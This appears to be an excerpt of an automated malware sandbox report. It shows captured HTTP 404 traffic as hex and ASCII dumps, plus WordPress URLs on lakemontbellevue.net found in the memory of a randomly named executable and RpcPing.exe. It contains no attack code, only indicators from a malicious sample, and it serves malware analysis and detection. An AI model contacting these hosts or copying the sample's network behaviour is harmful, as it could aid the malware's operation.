d3 3e dc 61 5a a0 66 11 ed 83 a2 5c d9 0a 25 5b 4f 56 34 7a de 48 53 82 df 9b 57 cf e4 a5 db 59 33 4c 63 85 fa 90 d3 38 66 7c e3 bb e0 8d f2 3d 78 ae f9 8c f2 fd e4 05 ba 9d c4 3b 9c f2 0f 9c 2b cc 26 6d 61 91 48 85 f4 7b 8b c5 c2 c4 4b 06 67 48 af 2a f5 2d 72 36 73 5d d7 ad e3 0e 5f a1 07 27 74 95 df 35 ef 91 e6 ba 2d ad 67 8e 0f e5 61 c7 62 9d f8 e3 eb cb 36 47 43 39 8a b9 ce f7 30 b8 84 da bc ea 99 a5 25 ae b6 51 82 1a 1e 9e ac 3e b4 3d 3c eb d8 99 b2 6e e7 d4 3e bb f1 8f aa c7 88 ee 35 73 72 78 55 c6 e0 72 92 0b c5 34 13 dc 97 98 52 cd 0a 34 68 a7 41 db c6 52 c6 51 1e ce cf c6 a4 7b 2b cc d6 22 f7 6f f2 7d 2b cc b4 e7 fd e8 b6 6d 06 88 54 a3 55 ad 8e a3 6e c6 c9 d8 98 15 c0 e2 a9 55 f7 d0 0a 83 c4 0b 9f 50 16 28 61 2e a5 90 01 49 bc 30 20 31 2b ce d1 4d cd 66 3a a1 72 46 29 55 aa f5 9f b4 58 61 70 9c 29 83 85 20 19 fc d7 a5 48 06 0d 7c 18 2e 13 04 89 4a 6c 65 84 50 8a 2d 50 89 90 0a f1 cc f8 06 d6 42 42 c6 36 89 86 84 16 08 2b 44 0e 12 33 51 60 dc 87 84 c6 c0 b4 02 4e 33 34 17 95 6f 8c 57 48 60 0a 34 66 b9 90 54 b2 b4 84 2d a7 05 65 29 5d a5 68 52 0f 2b 55 a4 ad bb 55 df da 63 f3 aa 7f 40 f8 0f Data Ascii: 2afTo0~J!i-MIVG.*vHX}2V}H}g9$:K3lB~g.o<'-YJ}Bv:Bn(5K[U'v;Ae\MXf)Z35rm/-'%T*S}s3EL(t{6,X $Lb,kJ).sl2DJU]vqy0V/f,-(ci>JF>aZf\%[OV4zHSWY3
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:38:33 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeX-Powered-By: ASP.NETCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=af3yOc4FsGEsXja9rF3cTz%2Bz0sDDk6LAUq7u1aqqzadAb1mg4Nh4IFGrVkbRovh13cJjFeul137wPcXslkVRRWKQA0a7tsQkusFJc%2B3wERR2tI%2BqQn89EScdZ0bZV47rPpKZUo3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 89d7f6967c1861bb-ORDContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 32 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8c 54 df 6f 9b 30 10 7e 8f 94 ff e1 4a d4 b7 80 21 69 ba 86 10 a4 2d 4d d4 49 ed 56 ad d9 af 47 07 2e c1 2a d8 cc 76 48 58 d4 ff 7d 32 10 92 56 7d 18 48 9c 7d fa be bb fb ce 67 82 8b db af b3 e5 ef c7 39 24 3a 4b e1 f1 fb a7 fb cf 33 b0 6c 42 7e 0e 67 84 dc 2e 6f e1 d7 dd f2 e1 1e 3c c7 85 27 2d 59 a4 09 99 7f b1 c0 4a b4 ce 7d 42 76 bb 9d b3 1b 3a 42 6e c8 f2 1b d9 9b 28 9e a1 35 4b 5b 55 1c 27 d6 b1 15 76 3b 41 95 65 9f a5 5c 4d df 89 e0 8d c7 e3 9a 58 83 91 c6 c6 66 a8 29 18 b4 8d 7f b6 ac 98 5a 33 c1 35 72 6d 2f cb 1c 2d 88 ea dd d4 d2 b8 d7 c4 b0 27 10 25 54 2a d4 53 a6 84 7d 73 33 1a db 9e 45 4c 28 cd 74 8a e1 95 7b 05 36 2c 58 8a 20 24 c4 4c 62 a4 85 2c 81 0b 0d 6b b1 e5 b1 13 90 1a d9 ed 04 4a 97 29 82 2e 73 6c 32 44 4a 55 e5 5d d8 76 b7 b3 12 71 79 c8 a8 dc 30 ee bb 93 b5 e0 da 56 ec 2f fa ce 07 cc ea ed 9a 66 2c 2d fd 1f 28 63 ca 69 1f 3e 4a 46 d3 3e dc 61 5a a0 66 11 ed 83 a2 5c d9 0a 25 5b 4f 56 34 7a de 48 53 82 df 9b 57 cf e4 a5 db 59 33 4c 63 85 fa 90 d3 38 66 7c e3 bb e0 8d f2 3d 78 ae f9 8c f2 fd e4 05 ba 9d c4 3b 9c f2 0f 9c 2b cc 26 6d 61 91 48 85 f4 7b 8b c5 c2 c4 4b 06 67 48 af 2a f5 2d 72 36 73 5d d7 ad e3 0e 5f a1 07 27 74 95 df 35 ef 91 e6 ba 2d ad 67 8e 0f e5 61 c7 62 9d f8 e3 eb cb 36 47 43 39 8a b9 ce f7 30 b8 84 da bc ea 99 a5 25 ae b6 51 82 1a 1e 9e ac 3e b4 3d 3c eb d8 99 b2 6e e7 d4 3e bb f1 8f aa c7 88 ee 35 73 72 78 55 c6 e0 72 92 0b c5 34 13 dc 97 98 52 cd 0a 34 68 a7 41 db c6 52 c6 51 1e ce cf c6 a4 7b 2b cc d6 22 f7 6f f2 7d 2b cc b4 e7 fd e8 b6 6d 06 88 54 a3 55 ad 8e a3 6e c6 c9 d8 98 15 c0 e2 a9 55 f7 d0 0a 83 c4 0b 9f 50 16 28 61 2e a5 90 01 49 bc 30 20 31 2b ce d1 4d cd 66 3a a1 72 46 29 55 aa f5 9f b4 58 61 70 9c 29 83 85 20 19 fc d7 a5 48 06 0d 7c 18 2e 13 04 89 4a 6c 65 84 50 8a 2d 50 89 90 0a f1 cc f8 06 d6 42 42 c6 36 89 86 84 16 08 2b 44 0e 12 33 51 60 dc 87 84 c6 c0 b4 02 4e 33 34 17 95 6f 8c 57 48 60 0a 34 66 b9 90 54 b2 b4 84 2d a7 05 65 29 5d a5 68 52 0f 2b 55 a4 ad bb 55 df da 63 f3 aa 7f 40 Data Ascii: 2a3To0~J!i-MIVG.*vHX}2V}H}g9$:K3lB~g.o<'-YJ}Bv:Bn(5K[U'v;Ae\MXf)Z35rm/-'%T*S}s3EL(t{6,X $Lb,kJ).sl2DJU]vqy0V/f,-(ci>JF>aZf\%[OV4zHSWY3Lc
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:38:36 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeX-Powered-By: ASP.NETCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MqKTcn9iGMHyHMMA3WPH6z2vazS6V8iwTQZTLDlA6l05ZPCJUi%2BR3ZtfgHtDA4YrtNBqlJzzRC7EMqINVOhUSLacE49X8B3XPnbj4BfHYW2%2BcKsXBue3dVqFDhyXtZX%2FEha9yDR5"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 89d7f6a73d6be17c-ORDalt-svc: h3=":443"; ma=86400Data Raw: 34 64 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 Data Ascii: 4dd<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Wed, 03 Jul 2024 15:41:21 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Wed, 03 Jul 2024 15:41:41 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Wed, 03 Jul 2024 15:41:43 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Wed, 03 Jul 2024 15:41:46 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Wed, 03 Jul 2024 15:41:49 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
            Source: jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://lakemontbellevue.net/wp-content/plugins/bluehost-wordpress-plugin/vendor/newfold-labs/wp-modu
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://lakemontbellevue.net/wp-content/themes/awp-marketing-agency/assets/css/dark-brown-theme.css?v
            Source: jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://lakemontbellevue.net/wp-content/themes/awp-marketing-agency/style.css?ver=6.5.5
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://lakemontbellevue.net/wp-content/themes/awpbusinesspress//assets/js/menu.js?ver=6.5.5
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://lakemontbellevue.net/wp-content/themes/awpbusinesspress//assets/js/mobile-menu.js?ver=6.5.5
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://lakemontbellevue.net/wp-content/themes/awpbusinesspress//assets/js/screen-reader-text.js?ver=
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://lakemontbellevue.net/wp-content/themes/awpbusinesspress/assets/css/all.min.css?ver=6.5.5
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://lakemontbellevue.net/wp-content/themes/awpbusinesspress/assets/css/animate.css?ver=6.5.5
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://lakemontbellevue.net/wp-content/themes/awpbusinesspress/assets/css/bootstrap-smartmenus.css?v
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://lakemontbellevue.net/wp-content/themes/awpbusinesspress/assets/css/bootstrap.min.css?ver=6.5.
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://lakemontbellevue.net/wp-content/themes/awpbusinesspress/assets/css/font-awesome/css/font-awes
            Source: RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://lakemontbellevue.net/wp-content/themes/awpbusinesspress/assets/css/loading-icon.css?ver=6.5.5
